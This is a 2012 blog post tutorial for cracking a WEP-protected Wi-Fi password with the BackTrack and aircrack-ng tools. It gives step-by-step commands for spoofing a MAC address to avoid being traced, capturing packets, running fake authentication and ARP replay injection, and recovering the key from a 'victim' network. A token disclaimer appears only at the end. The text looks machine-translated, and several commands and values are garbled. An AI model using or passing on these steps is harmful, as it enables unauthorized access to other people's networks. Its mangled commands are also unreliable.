How to Hack Password Wifi or Wireless

Written By Unknown on Thursday, January 12, 2012 | Thursday, January 12, 2012

Today I will explain to you how to solve the Wifi or wireless password in just 10 to 15 minutes. Today I will explain How to Hack or Crack Wifi Password. Hack day will be based on cracking WEP encryption password. So people tighten your belt for a new hack and let us begin to hack wifi. I also included a video below the post. So you can read and watch ....


1. Get the CD-Linux Backtrack
. Backtrack Linux Live CD (the best Linux available to hackers with more than 2000 hacking tools built-in).
Download Backtrack Linux Live CD from here:


Get victim of the attack is the password you want to hack or crack.
Now Enter Backtrack Linux CD into your CD drive and start it. After that click start on the black box in the lower left corner to load a "Konsole". Now you have to start Wifi card. To do so type:

You will see the name of your wireless card. (mine is named "ath0") From here you get out, change the name of your card with "ath0". Now type:
airmon-ng stop ath0

then type:

ifconfig wifi0 down

then type:

macchanger - mac 00:11:22:33:44:55 wifi0

then type:

airmon-ng start wifi0

the steps above have been explained unt forge yourself from being tracked. In step above our MAC address spoofing us, this will make us not be found.

Now type in:

airodump-ng ath0

All of the above steps in a single screen shot:

Now you will see a list of wireless networks in Konsole. Some will have a better signal than others and its always a good idea to choose one that has the best signal strength but it will take huge time to crack or hack password or you may not be cracked at all.
Once you see the network list, now select the network you want to hack. To freeze the screen airodump HOLD Cntrl key and press C.
Now you'll see something like this:


Now find the network you want to hack and MAKE SURE that he said that WEP encryption for the network. If it says WPA or WPA variations then move on ... You still can crack WPA with a retreat and some other tools but it is a whole other ball game and you need to master WEP first.

Once you disconnect the network, noting the channel number and BSSID. BSSID will look like this -

00:23:69: bb: 2d: of

Number of Channel will be under a heading that says "CH".
As shown in this picture:

Now in the same Konsole window type:
airodump-ng-c (channel)-w (file name) - BSSID (BSSID) ath0
Now in the same window type Konsole: The file name can be whatever you want. This file is the place where airodump will store the info packet that you receive for later cracking. You do not even included in the extension ... just choose a random word that you'll remember. I usually make my "Ben" because I can always remember it. Its just because i love Ben10 .... hhahahahaha: D
Note: If you want to crack more than one network in the same session, you need to have different file names for each one or it will not work. I usually name them as ben1, ben2 etc.
After you type the last command, the screen will change and start airodump shows your computer's meeting packet. You will also see the post marked "IV" with a number underneath. This stands for "Initialization Vector" but in general all this means "from the info packet that contains the characters of the password." Once you get at least 5000 IV, you can try to crack passwords. I've cracked just a few in 5000 and others have taken over 60,000. It depends on how long and hard they make a password. More difficult is to package the password you will need to solve it.
4. Cracking WEP password
Now leave this window up and running and open Konsole Konsole window 2.In the window type:
aireplay-ng -1 0-a (BSSID)-h 00:11:22:33:44:55 ath0
This will send some commands to the router that basically it is to connect your computer even if you do not officially associated with passwords. If the command is successful, you will see about 4 lines of text to print out with the last one to say something similar to "Association Successful :-)"If this happens, then either! You're almost there.
Now type:
aireplay-ng -3-b (BSSID)-h 00:11:22:33:44:55 ath0
This will generate a bunch of text and then you'll see a line where your computer is to gather a bunch of packets and waiting in the ARP and ACK. Do not worry about what this means ... just know that this is your meal ticket. Now you just sit and wait. Once your computer is finally collected an ARP request, it will send back to the router and start generating hundreds of ARP and ACK per second. Sometimes this starts to happen in seconds ... sometimes you have to wait until a few minutes. Just be patient. When it finally did not happen, switch back to the first Konsole window and you will see a number under IV began to increase rapidly. It's great! This means you are almost done! When the number is reached LEAST 5000 then you can begin to break your password. It will probably take more than this, but I always start my password cracking in 5000 only if they have a password that is really weak.
Now you need to open the third and final Konsole window. This will be where we are actually crack the password.Now type:
aircrack-ng-b (BSSID) (filename)-01.cap
Remember the name of the file created previously? Mine is "Ben". Do not put a space between it and-01.cap here. Types as you see it. So for me, I would type wepkey-01.capOnce you do this, you will see the fire start aircrack and crack passwords. You usually have to wait more like 10,000 to 20,000 IV before going to crack. If this happens, aircrack will test what you've got this far and then would say something like "not enough IV Try again in 10,000 .."DO NOT DO ANYTHING! It will keep running ... it's just letting you know that it exists in the gap until more IV gathered. Once you pass the 10,000 mark will automatically run again and try to solve it. If this fails then it will say "not enough IV Try again at 15,000 .." and so on until finally get it.
If you do everything correctly up to this point, before too long you will have the password! if the password seems silly now, dont worry, it will still work. some of the passwords are stored in ASCII format, in this case, aircrack will show you what they type in the characters for their passwords. Sometimes, though, the password is stored in the HEX format in case the computer will display the HEX encryption of passwords. It does not matter either way, because you can type in one and will connect you to the network.
Note that the password will always be displayed in the aircrack with a dot after every 2 characters. So for example if the password is "secret", is displayed as:
se: cr: et
This clearly will be an ASCII format. If it is HEX encrypted password is something like "0FKW9427VF" it will still be listed as:
0F: KW: 94:27: VF

Just remove the colon of the password, boot back into whatever operating system you use, try to connect to the network and type in the password without colons and presto! You are in!

It may seem like a lot to deal with if you've never done it, but after trying a few successful, you will be very fast with it. If I am near a WEP encrypted router with good signal, I often can crack the password in just a few minutes.

I am not responsible for what you do with this information. Each activity / dangerous illegal you do, falls entirely on you because ... technical ... This is only for you to test your own network security.

1 komentar:

Post a Comment

Popular Posts Today